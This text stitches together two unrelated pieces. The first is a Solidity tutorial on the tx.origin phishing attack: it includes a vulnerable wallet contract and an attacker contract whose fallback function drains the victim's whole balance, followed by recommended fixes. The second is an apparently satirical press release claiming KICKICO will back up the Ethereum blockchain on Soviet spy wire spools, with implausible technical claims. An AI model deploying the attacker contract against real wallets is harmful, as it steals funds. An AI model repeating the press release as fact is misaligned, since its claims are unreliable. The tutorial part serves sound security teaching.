A transaction origin attack is form of phising attack that can drain a contract of all funds.
Points of failuresUsing address.call.value(amount)() to transfer etherChecking identity of the owner of a contract using tx.origin
Contracts
TxOriginVictim is a Smart Contract is a wallet type contract.
pragma solidity ^0.4.18;
contract TxOriginVictim {address owner;
function TxOriginVictim() { owner = msg.sender;}function transferTo(address to, uint amount) public { require(tx.origin == owner); to.call.value(amount)();}function() payable public {}}
TxOriginAttack is a contract that will be used by the attacker.
pragma solidity ^0.4.18;
interface TxOriginVictim { function transferTo(address to, uint amount);}contract TxOriginAttacker {address owner;
function TxOriginAttacker() public { owner = msg.sender;}function getOwner() public returns (address) { return owner;}function() payable public { TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance);}}User transfers ether from their Smart Contract wallet to the address of the TxOriginAttackerEther hits the TxOriginAttacker contract and the fallback function is called, triggering:TxOriginVictim(msg.sender).transferTo(owner, msg.sender.balance)
3. The commands in the fallback function will “pose” as TxOriginVictim using it’s address msg.sender to transfer all the funds (msg.sender.balance) to the owner of the TxOriginAttacker contract
4. This works because in the TxOriginVictim contract we are checking for tx.origin NOT msg.sender
5. tx.origin is the original sender of a transaction and msg.sender is the immediate sender
6. Since the attacker has relayed the transaction using the address of TxOriginVictim, they can call the transferTo() function “posing” as the TxOriginVictim contract and pass msg.sender.balance (the entire balance of the sender) as the amount argument, there by draining the contract of all funds
SolutionsNever use tx.origin to check for authorisation of ownership instead use msg.senderDon’t use address.call.value(amount)(); instead use address.transfer()address.transfer() will have a gas stipend of 2300 — meaning possible attacking contracts would not have enough gas for further computation other than emitting Eventsaddress.transfer() also throws on failure
, an international company specializing in cyberattack prevention, has recently been tightly involved in the business of providing security for ICO projects. ICO industry is a very sensitive business prone to intrusions and hacking; according to a joint by Ernst & Young and Group-IB, in 2017, almost $400 million of the $3.7 billion raised (which is about 10%) was stolen or lost.
By using Group-IB’s Threat Intelligence technologies, we discovered that a hacker group was actively recruiting computer experts with proficiency in big data, machine learning, cryptography, and blockchain in the Darknet. Through analysis of this activity and profiles of invited specialists, Group-IB analysts have concluded that the group is likely preparing attacks on a number of cryptocurrency projects, including KICKICO.
KICKICO has united its forced with Group-IB to develop and apply necessary countermeasures. The conventional ones are Group-IB unsurpassed GIB-Crypto service which essentially is a comprehensive cybersecurity for ICOs, cryptocurrency wallets and exchanges, as well as anti-phishing solutions. Today we are thrilled to report that there will be unconventional countermeasures as well.
KICKICO specialists have designed a way to keep the blockchain safe and undamaged in case of an attack of any magnitude and destructive force — literally, on a hard media. To address the issue, KICKICO Research Team has reached out to the secret USSR developments aging back to the Cold War times and decided to imply the Soviet spy technology which enables to record and store the blockchain, literally using magnetic recording.
The Soviets have designed a lot of spy tech during 1960–1970s, including a portable spy wire recording device called . KICKICO technicians were able to modify Mezon to be able to record data instead of audio voice, on a thin 0.05 mm steel wire. The standard wire spool was enough to record one hour of voice audio, and an upgraded version of the machine (Mezon 2018) is capable of recording and storing up to 1TB of data which is enough for the entire Ethereum blockchain file in its current state.
Mezon M: a portable recorder, cutting-edge espionage technology of 1970s
KICKICO plans to record the blockchain file on wire spools and then distribute those wire spools among holders of KICKCOIN. Coin holders will be able to choose between DHL, UPS, Russian Post or their preferrable local delivery service.
This method has several important security features:
(i) Those records will be the literally hardware copies of the blockchain in a storage, not accessible from the Internet and not compatible with the present-day digital technology;
(ii) The data on the wire spool will be further encrypted, and the encoding method is a proprietary one, jointly developed by the two companies’ research teams;
(iii) Even if stolen, those wire spools will not be of any use to the criminals since they will not have a device to play the wire spool (all Mezons have been quietly bought out of the market and are currently stored privately by a number of crypto enthusiasts);
(iv) The magnetic wire retains its magnetic recording in a very wide range of temperatures, from -50 °C to +650 °C. That means that these blockchain wire spools are frost and heat-proof;
(v) This method will be used as a last resort to be able to back up the blockchain in case of a serious emergency, including nuclear attacks. At least three copies are destined to extremely distant and isolated locations in mid-Pacific and Latin America.
Once the dangerous phase is beyond, one of the holders will have to send her or his wire spool to KICKICO. The Research Team will then load the wire into recorder and get the data back online.
“We believe that it is essential to protect existing blockchain records from all threats at all possible levels, and the proposed solution implements a rare combination of the old-school data storage techniques and the cut-of-the-edge cryptography technologies,” says Ruslan Yusufov, Head of Group-IB ICO and Blockchain protection division.
“We are proud that combined efforts of the strongest cyberattack prevention company and the best blockchain and ICO community have made this possible. Mezon 2018 allows the mankind to establish a safe house for all key blockchains and cryptocurrencies,” says Alexander Petrov, KICKICO early investor and blockchain evangelist.
